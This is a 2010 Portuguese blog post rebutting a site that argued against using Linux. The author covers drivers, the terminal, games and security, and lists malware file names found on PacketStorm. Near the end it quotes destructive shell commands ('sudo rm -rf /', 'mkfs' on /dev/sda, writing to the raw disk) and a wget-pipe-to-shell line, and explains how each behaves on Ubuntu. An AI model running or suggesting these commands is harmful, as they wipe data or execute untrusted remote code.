Pesquisa em LivreSocial

quarta-feira, 24 de fevereiro de 2010

Quem disse que linux não é divertido ?

No post anterior, recebi um email que apontava para uma página que descrevia motivos para não usar Linux. A minha indignação com este texto foi bastante grande, mas não o suficiente para escrever qualquer coisa tentando mostrar que a maior parte do que foi escrito está fundamentado em argumentos vazios. Mas depois que eu li que o texto tinha sido recentemente atualizado, aí achei o fim da picada e escrevi em resposta, com o máximo de detalhes que eu encontrei.

Infelizmente, não recebi do autor nenhuma resposta sequer. Que fique bem claro, não sou contra o Windows, ou a Microsoft. Assim como muitos relacionam características que lhe são desagradáveis no Linux, assim também eu tenho algumas discordâncias no que diz respeito ao Windows. Mas nenhum dos dois é solução para tudo.

Acabo de vir de uma reunião excelente, com pessoas que não conhecia, onde debatemos acerca de assuntos comuns aos presentes, e entre eles, passamos pelos jogos para Linux.

Infelizmente, esta é uma outra área sofrida para Linux e outros SOs livres, aonde quase sempre se fala do que não se conhece. Recebi uma dica boa, mostrando uma lista de jogos FPS 3D para Linux, com alguns screenshots. Para os que gostam do "atira em tudo que se mexe", está é uma lista valiosa.

De todos estes, o que mais me diverte é o World Of Padman, muito bonito, rápido e bem humorado.

domingo, 21 de fevereiro de 2010

Será que eu voltei ?

Este texto é uma resposta a http://www.fanboysdelinux.hpg.com.br/

Vamos tentar digerir tudo, mas não antes de tomar um bom gole de Aloe Vera para facilitar o processo digestivo. Para simplificar, vou me referir ao site como FANBOYS.

  • FANBOYS - Você não acha estranho um sistema "tão bom" como é o linux segundo seus usuários xiitas, deter apenas 1% do mercado? Sim, isso mesmo, somente 1% dos computadores rodam Linux.
  • => De onde saiu este percentual exato? Qual foi a pesquisa que examinou TODOS os usuários domésticos do planeta ?

  • FANBOYS - Alegam que agora há synaptic, apt-get, entre outras ferramentas que facilitam a instalação. Isto não é totalmente verdadeiro, já que muitos outros programas não podem ser instalados através deles, além de drivers.
  • => As ferramentas synaptic (GUI), YAST (GUI e CLI), apt-get (CLI), aptitude (CLI), yum (CLI) são usadas para administração de softwares disponíveis nos repositórios. No caso dos drivers, quando o fabricante do hardware em questão se compromete em produzi-lo, ele está disponível. É o caso da HP, Xerox, Lexmark, ATI, NVIDIA. As máquinas de fotografia digital mais populares do mercado (SONY, Canon, Kodak, Yashica, etc) trabalham de forma padronizada, o que permite que QUALQUER Sistema Operacional que use USB possa acessar os seus arquivos (fotos) sem necessidade de software adicional. O mesmo acontece com celulares que armazeam mídia. Meus exemplos são Sony DSC T50 e o NOKIA XpressMusic

  • FANBOYS - Uma hora ou outra, você terá que recorrer ao terminal, a famosa janela preta. O Windows tem também, mas o terminal do Windows não é necessário para usuários domésticos convencionais, como provavelmente você que está com dúvidas se usa o Linux que veio no seu computador novo. O terminal do Windows é somente utilizado por experts que desejam configurar a gosto.
  • => Acredito que o que o autor chama de "usuários domésticos convencionais" são as pessoas que apenas usam o que está instalado. Estes usuários não sabem instalar absolutamente nada, sequer no Windows. Não conheço nenhum software destinado a "usuários domésticos convencionais" no Linux que precise sequer ser instalado, pelo menos no Ubuntu, pois a Canonical realiza um trabalho intenso para identificar quais softwares são mais utilizados por usuários de GUI, e os disponibiliza junto com o SO.
Assim sendo, ao encerrar a instalação do SO, já é possível editar um arquivo com formatação, visualizar arquivos de slides, editar fotografias, acessar internet, usar IMs, acessar a GUI de uma quantidade não limitada por licença de hosts na rede, usar software de torrents, gravar arquivos em sistema gratuito de Cloud Computing, usar um software de desenho vetorial, usar um organizador de mídias, usar um gravador simples de voz, entre outros softwares disponíveis na instalação.
Claro, todo este software está disponível para Windows, os mesmos ou equivalentes ou superiores. Mas obrigatoriamente terão que ser instalados DEPOIS da conclusão do Windows, e um de cada vez. Dependendo dos softwares necessários e do hardware, instalar o Windows, configura-lo e em seguida instalar os seus softwares pode levar mais de uma hora.
Pensando em usuário final, uma linha de comando é sempre menos indicada, mas por vezes inevitável. Vamos supor um suporte por telefone, que precise saber se o host do usuário em questão está na mesma rede de um outro host. Como este suporte faria para desenvolver esta tarefa em um Windows ou Linux recém instalados? Naturalmente, teria que pedir para o usuário final "pingar" o host destino. Em ambos os casos, o usuário final teria que digitar "ping x.y.z.w"

  • FANBOYS - Além disso, o terminal do Windows é muito mais intuitivo do que o do Linux (só pelo nome dos comandos dá para ter idéia do que fazem)
  • => quão intuitivo é digitar um comando xcopy, ftp, telnet, mode, title, sys, more, label, for ? linha de comando não é nem nunca será para qualquer usuário final. Apenas para profissionais. Assim, esta afirmação de intuitividade é muito relativa ... Mas apenas para lembrar, a tal "linha de comando" ou "janela preta" vem do início da década de 70, ou seja, antes da MS existir. Isso mostra que a experiência de "usabilidade" provavelmente vai pesar mais para o lado do Unix e descendentes.

  • FANBOYS - Há casos graves de falhas do Linux, como as de quem tem monitor LCD, se o sistema não reconhecer a placa de vídeo, o monitor entra "fora de escala" ou "fora de sincronia" (e não adianta usar o comando pra forçar resolução ou frequência). O único jeito de bootar então seria mexendo nos arquivos x.org config, o que exige conhecimento.
  • => Uma afirmação destas parece vir de um técnico novato. Em qualquer SO existe esta possibilidade, de um hardware qualquer não ser reconhecido. Tente instalar EM QUALQUER WINDOWS um hardware que precise de um driver, sem ter o driver. Se conseguir, aceito o fato que o Linux é um horror cheio de falhas graves.
E mesmo assim, se for possível corrigir isto sem ter que instalar o drive, ainda é melhor que não poder usar caso a única saída seja instalar um drive que vc não tem. Imagine se isto acontece com o Windows, e vc não tem acesso à internet para procurar o tal driver ???

  • FANBOYS - “Talvez eu devesse comprar uma cópia do Windows 7, ouvi dizer que ele… funciona. Como podemos esperar que usuários leigos usem essa montanha de lixo que é o Linux?”
  • => Wyatt disse isto, deixou o projeto, mas interessantemente, foi só ele que fez isso, pois os outros continuaram. Mas até mesmo aí eu olho pra trás e vejo o Vista, o NT4, o ME, o fiasco da primeira versão do 95, fora as falhas transmitidas pela tv do Windows 98 e do reconhecimento de voz.

  • FANBOYS - Fazendo uma consulta rápida ao softpedia.com, superdownloads, etc, você poderá ver que o Windows possui milhares de vezes mais softwares que Linux. Isso em um site de downloads! Imagine os outros milhares de softwares que o Windows tem. Além disso, a maioria dos softwares decentes de Linux gratuitos, tem versão igualmente gratuita para Windows, como Open Office, GIMP, etc.
  • => Eu questiono a opinião de quem busca softwares em sites como o superdownloads... Mas vá lá que seja. Considerando o tempo do Windows para Desktop, eu iria me surpreender se a maioria dos softwares desenvolvidos para Desktop não fosse para Windows. Mas a minha dúvida é: O QUE É QUE TEM A VER UM SOFTWARE SER DESENVOLVIDO PARA MAIS DE UMA PLATAFORMA ? A adobe desenvolve para Windows e para Mac. QUAL O PROBLEMA NISTO? Não é o "Linux" que faz os softwares, são desenvolvedores independentes ou empresas. QUAL O PROBLEMA NISTO???
  • FANBOYS - No Linux, se você quiser jogar, terá que usar o Wine. Além de ficar uma verdadeira gambiarra, a performace será comprometida e você precisará de conhecimentos bons para resolver problemas (como os de jogos on-line multiplayer e joysticks, volantes, etc) e colocar para funcionar direito. Ou seja, leigo? Tchau.
  • => Existem jogos disponíveis para Linux sim. Não tantos como existem para Windows, uma vez que os desenvolvedores fazem softwares EXCLUSIVAMENTE para Windows. Não há tantos jogos para Mac tb. Mas não preciso de Wine para jogar qualquer jogo. World of Padman é um exemplo excelente de jogo desenvolvido para as duas plataformas. Quake e Doom também, e sem emulador. Caso queira ver outras opções, visite www.tuxgames.com. Alguns lá precisam de Wine, outros rodam nativamente. Mas eu gostaria muito que os autores de Need for Speed escrevessem uma versão nativa para Linux. Mas, eles sabem dos motivos para não fazer isso, seja lá quais forem.

  • FANBOYS - A frase está no tempo errado: Windows pegava muitos vírus. Hoje, com o Windows Vista e Windows Seven, contaminar-se por motivos bobos como ocorriam antigamente, por exemplo, ao entrar em um site, plugar um pendrive ou pela rede, não ocorre mais. Pegar vírus sem intervenção do usuário era realmente válido, mas para Windows como o 98, que você entrava com o I.E em um site e o vírus já entrava automaticamente.
=> Esta foi no mínimo simples ... Fui no site da McAfee e achei o seguinte (em 21/2/2010) :
  • February 9, 2010: Microsoft has released their February 2010 Security Bulletins. A total of 13 bulletins have been released. Affected components include Microsoft Windows and Microsoft Office. Five of the bulletins are rated 'Critical' while an additional six are rated 'Important'. Eight of the bulletins carry a potential impact of remote code execution.
  • McAfee Labs identified a zero-day vulnerability in Microsoft Internet Explorer that was used as an entry point for “Operation Aurora” to exploit Google and a rapidly-growing list of other companies. Microsoft has issued a security bulletin and McAfee is working closely with them on this matter. “Operation Aurora” was a coordinated attack which included a piece of computer code that exploits a vulnerability in Internet Explorer to gain access to computer systems. This exploit is then extended to download and activate malware within the systems. The attack, which was initiated surreptitiously when targeted users accessed a malicious Web page (likely because they believed it to be reputable), ultimately connected those computer systems to a remote server. That connection was used to steal company intellectual property and, according to Google, additionally gain access to user accounts
  • Searching for the latest Winter Olympic news and downloads can cause serious damage to one’s computer. Cybercriminals are using Olympians’ names and images to lure surfers searching for the latest stories, screen savers and wallpapers to sites offering free downloads laden with viruses and malware.

O Site USN do Ubuntu mostra TODAS as falhas registradas, e nesta página, a primeira vulnerabilidade ocorre em 22-10-2004 e segue até 18-02-2010, em um total de 1037 ocorrências, o que gera uma média de 16 vulnerabilidades por mês (65 meses).

Pelo informe da McAfee, entrar num site com Internet Explorer também dá problema, e dos pesados. Mas para não ser tão parcial, fui em Security Focus, uma das referências no quesito vulnerabilidades (http://www.securityfocus.com/bid), e fiz as seguintes buscas:
- Com VENDOR=UBUNTU, TITLE=UBUNTU AMD and INTELx86-64: Nenhuma Vulnerabilidade
- Com VENDOR=UBUNTU, TITLE=UBUNTU LINUX: 46 Páginas de títulos de Vulnerabilidades
- Com VENDOR=MICROSOFT, TITLE=WINDOWS 7: Apenas 1 página
- Com VENDOR=MICROSOFT, TITLE=WINDOWS VISTA: Apenas 6 páginas
- Com VENDOR=MICROSOFT, TITLE=WINDOWS VISTA x64 EDITION: Apenas 5 páginas

Neste último caso, são listadas 140 vulnerabilidades, entre 28-08-2007 e 18-02-2010, ou seja, apenas 4,5 Vulnerabilidades por mês (31 meses). Assim, seguindo este ritmo, teríamos 2925 vulnerabilidades no mesmo período de 65 meses. Claro, isto é uma proporção no mínimo "irresponsável" de minha parte, considerando a melhoria de segurança que se viu no Windows, desde o XP PROFESSIONAL. Aliás, a procura no site acima com VENDOR=MICROSOFT, TITLE=WINDOWS XP PROFESSIONAL aponta "apenas" 17 páginas.

Considerando TODAS as 12 versões do Ubuntu (4.10, 5.04, 5.10, 6.04, 6.10, 7.04, 7.10, 8.04, 8.10, 9.04, 9.10, 10.04), percebo que é muito pouco perto das muitas versões do Windows (mais de 20, sem contar com os Service Packs), fazendo uma comparação igual, ou seja, desde as mais antigas versões do Windows, tipo Windows 3.11.

Um outro detalhe é que FANBOYS apenas relacionaram as falhas de Ubuntu. Note que o tempo de solução individual é razoavelmente pequeno, sendo em geral de poucas horas, desde o anúncio oficial das falhas até a publicação da mesma. A MS, porém, detém um recorde fantástico, que acho (realmente não tenho certeza) deve ser o maior tempo levado para solucionar uma vulnerabilidade: 17 anos ... pode ser visto em http://tech.slashdot.org/story/10/02/06/0158248/Microsoft-Finally-To-Patch-17-Year-Old-Bug?from=rss

  • FANBOYS - É mais uma mentira! Há sim vírus para linux, só que em menor quantidade, por dois motivos: O primeiro é que só possui 1% do mercado, e essas pessoas que usam, são pessoas com maior conhecimento (geeks, etc) e não cairiam em métodos comumente utilizados para infecção como engenharia social.
  • => O problema dos 1%, já foi comentado. Pelo texto acima, o Linux parece ser preferido pelas "pessoas com maior conhecimento". Me sinto lisonjeado. Nem quero imaginar qual o termo usado para usuários de Windows.

  • FANBOYS - http://packetstorm.codar.com.br
  • => O que foi encontrado na primeira página do PacketStorm, diga-se de passagem uma excelente referência, foi o seguinte:
evilbs.tar.gz - bindshell
connect-back.php.txt - script php
istari-public.tar.gz - python script
enyelkm-1.3-no-objs.tar.gz - rootkit
solaris-sshd.tar.gz - rootkit
funnyscript.c - código fonte
evilshell.c - backdoor
c99.tgz - php script
ezmal-0.2.zip - Trojan
3vilSh3ll.c - bindshell
m_rev-0.2.c - utility
rathole-1.2.tar.gz - backdoor
rcbd.c - backdoor
erne.txt - shell script
rel.tar.gz - rootkit
backdoor.tar.gz - rootkit
openssh-4.6p1-backdored.tar.gz - backdoor
openssh-4.5p1_backdoored.tar.gz - backdoor
mood-nt.tgz - rootkit
logginsh.txt - shell script
pingrootkit.tar.bz2 - rootkit
m0rtix.c - backdoor
wnetstat.pl - perl script
ssheater-1.1.tar.gz - código fonte

Aparentemente FANBOYS não sabe exatamente o que é vírus e o que é malware. Na Wikipedia a definição é "A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. [...] The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses.".

Nenhum dos itens relacionados acima são qualificados pelo próprio site como vírus. Se pelo menos o FANBOYS tivesse usado o termo correto não teria sido preciso procurar tanto. Mesmo assim fui procurar diversos textos que faziam a comparação Linux x Windows em termos de segurança, e achei esta afirmação (http://dotgiri.com/2009/02/10/reason-linux-less-virus-gaming-music-player/):
"To be very precise about this point;I should say that Linux is multi user operating system by birth itself, whereas Windows got transformed to a multi user OS from its original Single user model. Many of those Single user design is still used in modern version of windows. So if a virus infect a Linux system it is limited to that particular user alone where as in windows access to system files and access to every users is pretty easy. Hence the consequences of virus attach can be much more."

FANBOYS parece realmente não saber diferenciar tipos distintos de malware, como pode ser visto em http://under-linux.org/f138/peguei-virus-no-linux-135480/. A impressão é que o objetivo de FANBOYS ter posto este link no Under Linux foi tentar alardear que Linux também tem vírus, sem no entanto saber exatamente o que é vírus.

  • FANBOYS - Ora, e desde quando liberdade está associada só ao fato de ser gratuito?
  • => Este é o tipo de afirmação que um usuário Linux dificilmente faria, hoje em dia. Se falar um mínimo de inglês, vai saber que FREE tem as duas traduções (livre e gratuito). Costuma-se dizer "free as free speech, not free beer". Ou seja liberdade não está associado ao fato de ser gratuito. Não sei (nem foi dito) de onde saiu esta afirmação.

  • FANBOYS - No Windows nós pagamos pela comodidade de um sistema mais fácil de usar, comprometido com atualizações e que mantém um suporte para os clientes.
  • => Já falamos aqui do caso raro da MS levando 17 anos para corrigir uma vulnerabilidade.

  • FANBOYS - Estranho, pois o maior fórum de informática do Brasil é o Baboo, e é sobre Windows
  • => Gostaria de saber que pesquisa foi esta que apontou o BABOO como tal. Não me recordo de algo assim. Caso exista, eu não soube e gostaria de acessar o conteúdo desta pesquisa.

Deste ponto em diante, o texto fica tedioso e apelativo, por isso vou tentar filtrar os itens mais importantes.

  • FANBOYS - Linux - R$0,00 (mas você terá dores de cabeça, e ninguém será obrigado a lançar atualizações pra ele, já que é de graça); Windows Vista Starter (Diferentemente do XP starter, o Vista Starter é usável e decente) - Acréscimo de R$20 a 60,00 em média; Windows Seven Home Premium: Acréscimo de R$100,00 a R$150,00.; Você realmente acha caro R$120,00 por um sistema que irá facilitar a sua vida, proporcionar diversão, instalação de jogos, programas, etc e que durará no mínimo 4 anos, tendo updates mensalmente e tudo mais? É quase de graça!
  • => Infelizmente, ao acabar de instalar o Windows comprado, vai estar faltando instalar os softwares necessários: Office, jogos, software de desenho e outros. Interessantemente FANBOYS esqueceu de incluir este detalhe irrisório no cálculo de preços. Além disso, eu quase não entendi o porquê do termo "dor de cabeça", mas depois lembrei que o Linux parece ser preferido pelas "pessoas com maior conhecimento", como foi dito acima. Seguindo o pensamento do FANBOYS, quem vai ter problemas é o usuário do Windows, já que os usuários do Linux são "pessoas com maior conhecimento". Aliás, FANBOYS parece desconhecer que distribuições como Slackware e DEBIAN estão a bastante tempo no mercado , e continuam fornecendo atualização, mesmo sendo "de graça".

  • FANBOYS - Você conhece, algum produto em que a empresa que o vendeu ainda tenha gastos com o cliente após anos e anos de ter sido vendido além do Windows? Não existe!
  • => Para citar alguns, RedHat e Ubuntu. Aliás, a versão 10.04 do Ubuntu será lançada em modalidade LTS.

  • FANBOYS - Por que os usuários de Linux atacam tanto a Microsoft?
  • => Isso não é verdade. Normalmente, nosso ataque tem sido defesa. Pelo menos é o meu caso, como neste próprio texto.

  • FANBOYS - Linux é para quem entende de informática, e Windows para leigo?
  • => Pelo que o FANBOYS disse anteriormente, é. Foi FANBOYS quem disse, não eu: os usuários do Linux são "pessoas com maior conhecimento".

  • FANBOYS - Por que eles escolheram Linux?
  • => Até este ponto, o texto estava tão bom quanto qualquer defesa mal elaborada. Daqui em diante, o autor propõe suas respostas pessoais para perguntas que ele mesmo cria. Assim, vou rebater com minhas palavras também.

  • FANBOYS - "Argumentos como os de "posso fazer do meu jeito", "compilar", etc não servem para um uso doméstico."
  • -> Escolhi para aprender algo diferente, e passei a usar por me apresentar mais estabilidade e menos problemas de travamentos. Configurar um SO é, foi e sempre será uma tarefa não destinada a usuários domésticos. Pelo contrário, usuários domésticos nos pagam para fazer isso.

  • FANBOYS - Outra explicação é que alguns dos usuários Linux tem alguns problemas sociais (se você duvida, pesquise e verá que a maioria deles não possui vida social boa, e principalmente, tem dificuldades em arranjar um parceiro(a).
  • -> Não consigo achar a fonte desta "pesquisa" e muito menos base para esta afirmação sexual. Nem tenho idéia de onde ele tenha procurado esta informação. Para que conste nos autos, eu sou casado.

  • FANBOYS - Sim, Linux é comunista, como a grande maioria dos softwares open-source. O “Software Livre”, de acordo com os preceitos da Free Software Foundation (que criou o termo), é nada mais do que uma expressão do Marxismo, ou seja, capital intelectual obrigatoriamente aberto e distribuído à todos.
  • -> Este texto está ficando cada vez pior ... Linux começou com uma brincadeira de um estudante e se tornou um sistema operacional como outro qualquer. Aliás, Linux nem é sistema operacional, é apenas o kernel. Mas, e se fosse realmente comunista: É criminoso quem defende o comunismo ? Comunistas são pessoas não quistas? Só falta dizer que Linux é ferramenta do neo-nazismo...

  • FANBOYS - O fato de ser gratuito não significa que seja uma coisa boa. O Linux oferecer tudo gratuitamente chega a ser uma concorrência desleal, e caso o mesmo tivesse muito mercado, traria sérios problemas a quem precisa do seu pão-de-cada-dia, pois há tanto suporte gratuito que não há espaço para ganhar dinheiro.
  • -> Considerar o Linux como "concorrência desleal" me faz entender que mesmo para FANBOYS Linux não é tão insignificante assim, já chegando a ser concorrência. Bom, de qualquer jeito, eu vivo de Linux, seja em treinamentos, seja em consultorias, seja em empregos. E pela graça de Deus, já até mudei de estado por isso. Parafraseando o personagem do Tom Cavalcanti, "podia estar matando, roubando ou me prostituindo", mas preferi Linux. "Caso o mesmo tivesse muito mercado" indica que FANBOYS está aparentemente desatualizado. Profissionais MCSE, MCSA, LPIC, RHCE são igualmente muito requisitados e em geral bem remunerados, entretanto uma empresa de médio porte não precisa de 20 MCSEs ou LPICs. A maior quantidade de profissionais necessários serão os menos especializados. Uma engenharia precisa de menos operários do que engenheiros.

  • FANBOYS - Se isso fosse verdade, por que 90% dos usuários do Linux sempre tem alguma imagem do Pinguim tomando suco de Windows, batendo na borboleta do MSN, e coisas do tipo?
  • -> Tem mesmo estes wallpapers, mas ... de onde saíram estes 90% ??? ainda não vi esta pesquisa que foi a cada usuário final ver a imagem do Desktop.

  • FANBOYS - Comandos Letais do Linux
  • => Vou corrigir os erros cometidos por FANBOYS, caso estivesse sendo usado um Ubuntu:
  1. sudo rm -rf / (deltree c:\) : Sem sudo não pode ser executado
  2. sudo mkfs.ext3 /dev/sda (format c:) : não formata a partição caso esteja sendo usada (montada)
  3. qualquer_comando > /dev/sda : mesmo com sudo não funcionaria por causa das permissões de escrita. Seria preciso estar usando o sistema como root, o que normalmente não acontece
  4. sudo wget http://alguma_fonte_não_confiável -O- | sh : Sem sudo não pode ser executado
  5. char etc etc etc : não deu em nada, mesmo executado como root
  6. Sequência de chaves, dois pontos e outros caracteres: aqui deu mensagem de erro de sintaxe, mesmo executado como root. Copiei literalmente como estava no texto de FANBOYS.
Infelizmente, FANBOYS usa citações sem origem citada. Infelizmente, tudo quase passa a ser pessoal. Não citando autores das suas afirmações, ela podem ser compreendidas como opinião própria.
Quero crer que FANBOYS esqueceu de incluir estas citações, como é o caso das porcentagens, das frases, etc. As poucas citações mencionadas me fazem crer que foi mais um descuido no momento de compor o texto.
Entretanto, as afirmações de dificuldade de relacionamento, tendências políticas parecem ser extremamente discriminatórias, o que é no mínimo lamentável.
Infelizmente, em nosso país, é muito difícil manter uma discussão saudável sem que haja um tom de ironia, ou recursos de apelação grosseira.
Confesso, lancei mão da ironia em algumas vezes, baseado em afirmações muito mal elaboradas por FANBOYS.

Este texto foi escrito em toda uma madrugada, e ao final será enviado um email ao autor de FANBOYS.

Grande Abraço

Notícias Linux

Dicas-L: Dicas técnicas de Linux e Software Livre

Ubuntu Dicas

Security Fix

 
Creative Commons License
Blog Livre e Social by Gilberto Martins is licensed under a Creative Commons Atribuição 2.5 Brasil License.